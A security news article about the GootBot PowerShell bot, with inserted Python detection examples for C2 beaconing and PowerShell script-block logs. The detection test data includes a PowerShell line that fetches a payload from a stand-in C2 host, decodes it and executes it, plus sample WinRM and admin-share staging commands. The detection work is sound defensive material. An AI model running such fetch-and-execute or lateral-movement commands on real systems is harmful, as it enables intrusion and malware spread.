In a recent discovery, the IBM X-Force research team has detected a fresh iteration of the notorious Gootloader malware, dubbed “GootBot.” This malware exhibits stealthy lateral movement capabilities, making it a challenging adversary to detect and block within corporate networks.
As revealed in a blog post by Golo Mühr and Ole Villadsen, the Gootloader group has introduced their custom bot, GootBot, into the later stages of their attack chain. This strategic move is aimed at eluding detection, employing readily available tools such as RDP (Remote Desktop Protocol) or CobaltStrike for command and control (C2) communication.
Initially, Gootloader malware served as an initial access tool, but it has undergone substantial evolution to now include GootBot, a lightweight obfuscated PowerShell script. GootBot is typically downloaded following a Gootloader infection and operates by receiving commands via C2 communication, facilitated through encrypted PowerShell scripts.
The origins of the Gootloader group, also known as UNC2565 or Hive0127, date back to 2014 when they initially focused on deploying SEO poisoning techniques and compromising WordPress websites to distribute the Gootkit-based Gootloader malware. Melissa Bischoping, Tanium’s director of endpoint security research, explained the mechanics of SEO poisoning, emphasizing that it manipulates search results for specific keywords to lead users to malicious content. This technique plays on the mistaken belief that highly ranked search results guarantee the safety of a website, thereby exploiting a user’s trust in search engine rankings.
The group often targets business-related search queries, using legitimate-looking websites optimized to appear on the first page of search results. Once users visit these deceptive pages, they are coaxed into downloading seemingly innocuous archive files that, in reality, conceal the Gootloader malware.
In March 2021, the cybersecurity firm Sophos confirmed that Gootloader had evolved into a sophisticated loader framework, transitioning from being a mere initial access point. It was revealed that the delivery methods had expanded beyond the Gootkit malware family, with Gootloader being employed by numerous threat groups, including ransomware affiliates and additional payloads like SystemBC and IcedID.
GootBot, a novel variant of Gootloader, presents itself as a PowerShell payload, encapsulating a single C2 server address. It employs string replacements for mild obfuscation, akin to its predecessor Gootloader. The malware sends GET requests to the C2 server, requesting PowerShell tasks and receiving Base64-encoded payloads, with the last eight digits of the code denoting the task’s name. These payloads are decoded and injected into script blocks before execution, functioning asynchronously with a default beaconing interval of 60 seconds. Completed tasks are reported as results in the next loop iteration.
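The most detectable trait in the behaviour described above is the cadence: repeated GET requests to one C2 address roughly every 60 seconds. The following added example (not code from the X-Force report) scans constructed proxy log lines and flags source/destination pairs whose GET intervals are regular and close to a 60-second period; the log format, host names and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: timestamp, source host, method, destination host.
# One host (ws-17) polls c2.example.invalid about once a minute, with small jitter.
SAMPLE_LOG = """\
2023-11-01T10:00:00 ws-17 GET c2.example.invalid
2023-11-01T10:00:05 ws-17 GET cdn.vendor.invalid
2023-11-01T10:01:00 ws-17 GET c2.example.invalid
2023-11-01T10:02:01 ws-17 GET c2.example.invalid
2023-11-01T10:02:40 ws-17 GET news.site.invalid
2023-11-01T10:03:00 ws-17 GET c2.example.invalid
2023-11-01T10:03:59 ws-17 GET c2.example.invalid
2023-11-01T10:05:00 ws-17 GET c2.example.invalid
2023-11-01T10:00:12 ws-22 GET cdn.vendor.invalid
2023-11-01T10:04:30 ws-22 GET cdn.vendor.invalid
2023-11-01T10:04:31 ws-22 GET cdn.vendor.invalid
"""

def parse_log(text):
    """Group GET request timestamps by (source, destination)."""
    series = defaultdict(list)
    for line in text.splitlines():
        ts, src, method, dst = line.split()
        if method == "GET":
            series[(src, dst)].append(datetime.fromisoformat(ts))
    return series

def beacon_score(timestamps):
    """Return (mean gap in seconds, coefficient of variation) for a request series.
    A low coefficient of variation means the gaps are nearly identical, i.e. a timer."""
    ts = sorted(timestamps)
    if len(ts) < 2:
        return 0.0, float("inf")
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    return avg, (pstdev(gaps) / avg if avg else float("inf"))

def find_beacons(text, min_requests=5, max_cv=0.1, expected=60.0, tolerance=5.0):
    """Return (src, dst, mean_gap) for pairs whose GET cadence is regular and near `expected`."""
    hits = []
    for (src, dst), stamps in parse_log(text).items():
        if len(stamps) < min_requests:
            continue
        avg, cv = beacon_score(stamps)
        if cv <= max_cv and abs(avg - expected) <= tolerance:
            hits.append((src, dst, round(avg, 1)))
    return hits
```

A bot with randomised sleep would raise the coefficient of variation, so the `max_cv` threshold should be tuned against baseline traffic rather than fixed.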
Notably, GootBot is designed to facilitate lateral movement within networks. Its C2 infrastructure can efficiently generate multiple GootBot payloads, each featuring a distinct C2 address, thereby enabling the infection of multiple hosts. It also conducts reconnaissance and assigns a unique GootBot ID for each host.
This versatile malware empowers attackers to rapidly propagate across compromised networks, with the ability to deploy additional malicious software. In contrast to Gootloader, GootBot leverages infected domains to reach the domain controller, signifying a shift in attack tactics. This shift enhances the success rate of post-exploitation stages, particularly in Gootloader-based ransomware affiliate activities.
GootBot exhibits the capability to extract valuable information, including domain user names, OS details read from the registry, and various system-related data. This information is then formatted together with the host's GootBot ID before being reported.
The emergence of the GootBot variant underscores the fact that threat actors are employing increasingly sophisticated methods to maintain their stealth and spread laterally across networks. Such lateral-movement scripts encompass various techniques, including WinRM, SMB, and WinAPI calls, enabling the propagation of payloads to other hosts.
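Because the bot and its lateral-movement tasks are PowerShell, script block logging (Event ID 4104) is a natural place to look for the decode-then-execute pattern described earlier and for WinRM or SMB remoting. The following added example (not code from the report) runs a few assumed heuristic patterns over constructed 4104 records; the event content, host names and indicator list are assumptions, not signatures from the report.

```python
import re

# Constructed Event ID 4104 records (host, event id, ScriptBlockText); not from the report.
SAMPLE_EVENTS = [
    {"host": "ws-17", "id": 1, "text":
        "$r=(Invoke-WebRequest 'http://c2.example.invalid/t').Content;"
        "$b=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r.Substring(0,$r.Length-8)));"
        "[ScriptBlock]::Create($b).Invoke()"},
    {"host": "ws-17", "id": 2, "text":
        "Invoke-Command -ComputerName fs-01 -ScriptBlock { Get-Process }"},
    {"host": "ws-17", "id": 3, "text":
        "Copy-Item C:\\Users\\Public\\stage.ps1 -Destination \\\\fs-02\\C$\\Windows\\Temp\\"},
    {"host": "ws-22", "id": 4, "text":
        "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
]

# Assumed heuristics: every pattern in a rule must match for the rule to fire.
RULES = {
    # Base64 payload decoded and handed straight to a new script block / Invoke-Expression
    "decode_then_execute": [r"FromBase64String",
                            r"\[ScriptBlock\]::Create|Invoke-Expression|\biex\b"],
    # PowerShell remoting over WinRM
    "winrm_remoting": [r"Invoke-Command|New-PSSession|Enter-PSSession"],
    # File staging to an administrative share over SMB (\\host\C$ or \\host\ADMIN$)
    "smb_admin_share": [r"\\\\[\w.-]+\\(?:C\$|ADMIN\$)"],
}

def classify(text):
    """Return the names of all rules whose patterns all match the script block text."""
    return [name for name, patterns in RULES.items()
            if all(re.search(p, text, re.IGNORECASE) for p in patterns)]

def triage(events):
    """Map each host to its flagged (event id, matched rules) pairs; hosts with no hits are omitted."""
    findings = {}
    for ev in events:
        rules = classify(ev["text"])
        if rules:
            findings.setdefault(ev["host"], []).append((ev["id"], rules))
    return findings
```

A single host that trips both the decode-then-execute rule and a remoting rule within a short window is a stronger signal than either event alone, so correlate per host rather than alerting on each record.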
In the face of the persistent Gootloader threat, organizations are being urged to bolster their defenses with advanced security methods. This includes implementing endpoint detection and response (EDR) solutions and staying vigilant by keeping software up to date to fend off the looming danger.
Casey Ellis, the founder and chief strategy officer of cybersecurity firm Bugcrowd, weighed in on the current Gootloader campaign, characterizing it as a well-organized and considerate “initial access broker” (IAB). The deployment of malicious SEO (Search Engine Optimization) tactics, despite not being highly targeted, fits the opportunistic nature of an IAB’s attack strategy. Ellis highlights the evolving landscape of organized cybercrime, which now includes the adoption of a long-term and wide-reaching approach by threat actors.
Darren Guccione, CEO and co-founder of Keeper Security, underscores the challenges that innocent users face when trying to distinguish between legitimate and counterfeit search results. This challenge is what makes SEO poisoning so effective. Guccione points out that individuals who lack expertise in SEO and SEO-related attack methods often focus on the visual elements of search results, such as domain names and logos. Threat actors often employ persuasive language like “Official Website” to entice users into clicking on potentially hazardous links or visiting fake websites capable of delivering Gootloader or other malware to their devices.
However, Guccione recommends exercising scrutiny when evaluating websites. He suggests that counterfeit or spoofed websites often have website addresses that differ from the official company name and may use different domain extensions compared to legitimate websites. A majority of reputable websites typically employ the .com domain extension, making deviations from this norm a potential warning sign. In situations of uncertainty, exercising caution and refraining from clicking on any links is a wise course of action. Guccione also highlights the utility of online tools like the Google Transparency Report, which can assist in determining the safety of a website. These precautions are vital in an environment where the Gootloader threat persists, underscoring the importance of vigilance and advanced security measures to protect organizations and individuals from cyberattacks.